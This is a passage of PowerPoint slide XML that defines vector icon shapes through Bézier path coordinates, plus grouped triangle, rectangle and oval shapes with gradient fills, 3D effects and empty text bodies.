                        <a:pt x="12351" y="2526"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12376" y="2054"/>
                        <a:pt x="12189" y="1596"/>
                        <a:pt x="11782" y="1147"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11258" y="569"/>
                        <a:pt x="10630" y="216"/>
                        <a:pt x="9872" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9126" y="-41"/>
                        <a:pt x="8358" y="-30"/>
                        <a:pt x="7564" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6780" y="309"/>
                        <a:pt x="6032" y="595"/>
                        <a:pt x="5324" y="997"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4617" y="1399"/>
                        <a:pt x="4048" y="1811"/>
                        <a:pt x="3626" y="2213"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3464" y="2066"/>
                        <a:pt x="3302" y="1918"/>
                        <a:pt x="3141" y="1773"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2963" y="1614"/>
                        <a:pt x="2739" y="1530"/>
                        <a:pt x="2471" y="1535"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2200" y="1535"/>
                        <a:pt x="1977" y="1647"/>
                        <a:pt x="1793" y="1853"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1615" y="2054"/>
                        <a:pt x="1530" y="2288"/>
                        <a:pt x="1565" y="2536"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1589" y="2793"/>
                        <a:pt x="1696" y="2989"/>
                        <a:pt x="1880" y="3139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2044" y="3270"/>
                        <a:pt x="2203" y="3401"/>
                        <a:pt x="2364" y="3537"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1731" y="4276"/>
                        <a:pt x="1207" y="5094"/>
                        <a:pt x="795" y="5957"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="378" y="6820"/>
                        <a:pt x="130" y="7676"/>
                        <a:pt x="37" y="8509"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-59" y="9346"/>
                        <a:pt x="33" y="10113"/>
                        <a:pt x="298" y="10824"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="566" y="11540"/>
                        <a:pt x="1056" y="12148"/>
                        <a:pt x="1774" y="12723"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2942" y="13658"/>
                        <a:pt x="4321" y="14056"/>
                        <a:pt x="5915" y="13967"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7507" y="13874"/>
                        <a:pt x="9223" y="13415"/>
                        <a:pt x="11064" y="12461"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12532" y="14093"/>
                        <a:pt x="14002" y="15716"/>
                        <a:pt x="15470" y="17223"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14849" y="17728"/>
                        <a:pt x="14305" y="18018"/>
                        <a:pt x="13826" y="18111"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13344" y="18210"/>
                        <a:pt x="12917" y="18200"/>
                        <a:pt x="12530" y="18088"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12142" y="17971"/>
                        <a:pt x="11782" y="17803"/>
                        <a:pt x="11455" y="17587"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11125" y="17368"/>
                        <a:pt x="10799" y="17181"/>
                        <a:pt x="10474" y="17026"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10154" y="16872"/>
                        <a:pt x="9823" y="16788"/>
                        <a:pt x="9486" y="16783"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9145" y="16778"/>
                        <a:pt x="8785" y="16937"/>
                        <a:pt x="8388" y="17265"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7981" y="17606"/>
                        <a:pt x="7777" y="18004"/>
                        <a:pt x="7777" y="18453"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7777" y="18897"/>
                        <a:pt x="7991" y="19351"/>
                        <a:pt x="8408" y="19809"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8830" y="20268"/>
                        <a:pt x="9379" y="20651"/>
                        <a:pt x="10042" y="20955"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10708" y="21259"/>
                        <a:pt x="11455" y="21451"/>
                        <a:pt x="12279" y="21502"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13103" y="21559"/>
                        <a:pt x="13970" y="21437"/>
                        <a:pt x="14886" y="21109"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15807" y="20787"/>
                        <a:pt x="16721" y="20202"/>
                        <a:pt x="17617" y="19332"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18051" y="19739"/>
                        <a:pt x="18489" y="20127"/>
                        <a:pt x="18921" y="20501"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19107" y="20656"/>
                        <a:pt x="19328" y="20731"/>
                        <a:pt x="19601" y="20712"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19861" y="20703"/>
                        <a:pt x="20090" y="20586"/>
                        <a:pt x="20269" y="20375"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20455" y="20160"/>
                        <a:pt x="20532" y="19921"/>
                        <a:pt x="20503" y="19674"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20477" y="19421"/>
                        <a:pt x="20371" y="19229"/>
                        <a:pt x="20192" y="19089"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19755" y="18752"/>
                        <a:pt x="19321" y="18397"/>
                        <a:pt x="18884" y="18022"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19626" y="17143"/>
                        <a:pt x="20221" y="16217"/>
                        <a:pt x="20664" y="15300"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21103" y="14379"/>
                        <a:pt x="21367" y="13490"/>
                        <a:pt x="21453" y="12667"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21540" y="11839"/>
                        <a:pt x="21439" y="11091"/>
                        <a:pt x="21159" y="10412"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20880" y="9725"/>
                        <a:pt x="20386" y="9135"/>
                        <a:pt x="19678" y="8570"/>
                      </a:cubicBezTo>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15" name="AutoShape 54"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8375650" y="2896394"/>
                  <a:ext cx="70644" cy="73819"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10791 197"/>
                    <a:gd name="T1" fmla="*/ T0 w 21188"/>
                    <a:gd name="T2" fmla="+- 0 10794 193"/>
                    <a:gd name="T3" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T4" fmla="+- 0 10791 197"/>
                    <a:gd name="T5" fmla="*/ T4 w 21188"/>
                    <a:gd name="T6" fmla="+- 0 10794 193"/>
                    <a:gd name="T7" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T8" fmla="+- 0 10791 197"/>
                    <a:gd name="T9" fmla="*/ T8 w 21188"/>
                    <a:gd name="T10" fmla="+- 0 10794 193"/>
                    <a:gd name="T11" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T12" fmla="+- 0 10791 197"/>
                    <a:gd name="T13" fmla="*/ T12 w 21188"/>
                    <a:gd name="T14" fmla="+- 0 10794 193"/>
                    <a:gd name="T15" fmla="*/ 10794 h 21203"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21188" h="21203">
                      <a:moveTo>
                        <a:pt x="17615" y="468"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17606" y="468"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="14870" y="2476"/>
                        <a:pt x="12200" y="4590"/>
                        <a:pt x="9727" y="6958"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7348" y="9227"/>
                        <a:pt x="5200" y="11619"/>
                        <a:pt x="3329" y="14060"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="341" y="17962"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="350" y="17970"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="-197" y="18786"/>
                        <a:pt x="-106" y="19880"/>
                        <a:pt x="638" y="20590"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1491" y="21407"/>
                        <a:pt x="2889" y="21407"/>
                        <a:pt x="3746" y="20590"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3877" y="20460"/>
                        <a:pt x="3984" y="20321"/>
                        <a:pt x="4069" y="20174"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="6867" y="16517"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8601" y="14255"/>
                        <a:pt x="10606" y="12027"/>
                        <a:pt x="12824" y="9913"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15281" y="7570"/>
                        <a:pt x="17557" y="5758"/>
                        <a:pt x="20329" y="3749"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="20321" y="3741"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="20400" y="3684"/>
                        <a:pt x="20473" y="3635"/>
                        <a:pt x="20543" y="3570"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21402" y="2753"/>
                        <a:pt x="21402" y="1427"/>
                        <a:pt x="20543" y="606"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19742" y="-161"/>
                        <a:pt x="18472" y="-193"/>
                        <a:pt x="17615" y="468"/>
                      </a:cubicBezTo>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16" name="AutoShape 55"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8448675" y="2649538"/>
                  <a:ext cx="71438" cy="74613"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10803 213"/>
                    <a:gd name="T1" fmla="*/ T0 w 21180"/>
                    <a:gd name="T2" fmla="+- 0 10801 203"/>
                    <a:gd name="T3" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T4" fmla="+- 0 10803 213"/>
                    <a:gd name="T5" fmla="*/ T4 w 21180"/>
                    <a:gd name="T6" fmla="+- 0 10801 203"/>
                    <a:gd name="T7" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T8" fmla="+- 0 10803 213"/>
                    <a:gd name="T9" fmla="*/ T8 w 21180"/>
                    <a:gd name="T10" fmla="+- 0 10801 203"/>
                    <a:gd name="T11" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T12" fmla="+- 0 10803 213"/>
                    <a:gd name="T13" fmla="*/ T12 w 21180"/>
                    <a:gd name="T14" fmla="+- 0 10801 203"/>
                    <a:gd name="T15" fmla="*/ 10801 h 21196"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21180" h="21196">
                      <a:moveTo>
                        <a:pt x="8372" y="11356"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6122" y="13508"/>
                        <a:pt x="3675" y="15444"/>
                        <a:pt x="1144" y="17292"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="963" y="17388"/>
                        <a:pt x="786" y="17493"/>
                        <a:pt x="637" y="17645"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-213" y="18457"/>
                        <a:pt x="-213" y="19774"/>
                        <a:pt x="637" y="20585"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1464" y="21380"/>
                        <a:pt x="2796" y="21397"/>
                        <a:pt x="3652" y="20641"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3665" y="20649"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="6364" y="18673"/>
                        <a:pt x="8988" y="16581"/>
                        <a:pt x="11419" y="14263"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13759" y="12030"/>
                        <a:pt x="15873" y="9685"/>
                        <a:pt x="17715" y="7283"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="20663" y="3427"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20654" y="3419"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21386" y="2600"/>
                        <a:pt x="21357" y="1379"/>
                        <a:pt x="20541" y="608"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19697" y="-203"/>
                        <a:pt x="18323" y="-203"/>
                        <a:pt x="17468" y="608"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17313" y="760"/>
                        <a:pt x="17197" y="937"/>
                        <a:pt x="17094" y="1114"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="14228" y="4857"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="12526" y="7090"/>
                        <a:pt x="10552" y="9275"/>
                        <a:pt x="8372" y="11356"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="25" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5338" y="2772"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="26" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="28" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="30" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="31" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
